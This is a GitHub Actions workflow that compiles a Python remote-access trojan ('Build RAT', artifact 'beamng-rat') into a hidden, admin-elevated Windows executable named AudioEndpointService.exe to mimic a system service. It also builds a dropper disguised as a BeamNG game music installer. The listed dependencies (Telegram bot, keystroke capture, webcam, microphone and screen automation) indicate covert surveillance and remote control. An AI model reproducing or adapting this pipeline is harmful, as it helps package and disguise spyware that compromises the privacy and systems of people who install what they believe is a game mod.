name: Build EXE

on:
  push:
    branches: [ main ]

jobs:
  build:
    runs-on: windows-latest

    steps:
    - uses: actions/checkout@v3
    
    - name: Set up Python
      uses: actions/setup-python@v4
      with:
        python-version: '3.11'
    
    - name: Fix Python environment
      run: |
        python -m pip install --upgrade pip
        pip install --upgrade setuptools wheel
        pip install pyinstaller --upgrade
    
    - name: Install dependencies
      run: |
        pip install python-telegram-bot pillow opencv-python pynput cryptography pywin32 pyaudio requests psutil wmi pyautogui numpy
        pip install --no-cache-dir --force-reinstall python-telegram-bot

    - name: Build RAT
      run: |
        pyinstaller --onefile --noconsole --hidden-import=python_telegram_bot --hidden-import=telegram --hidden-import=requests --hidden-import=pillow --hidden-import=cv2 --collect-all python_telegram_bot --collect-all telegram --uac-admin tat.py --name AudioEndpointService.exe

    - name: Build Setup
      run: |
        pyinstaller --onefile --noconsole --uac-admin setup_installer.py --name BeamNG_Music_Setup.exe

    - name: Upload artifacts
      uses: actions/upload-artifact@v4
      with:
        name: beamng-rat
        path: dist/*.exe
        compression-level: 0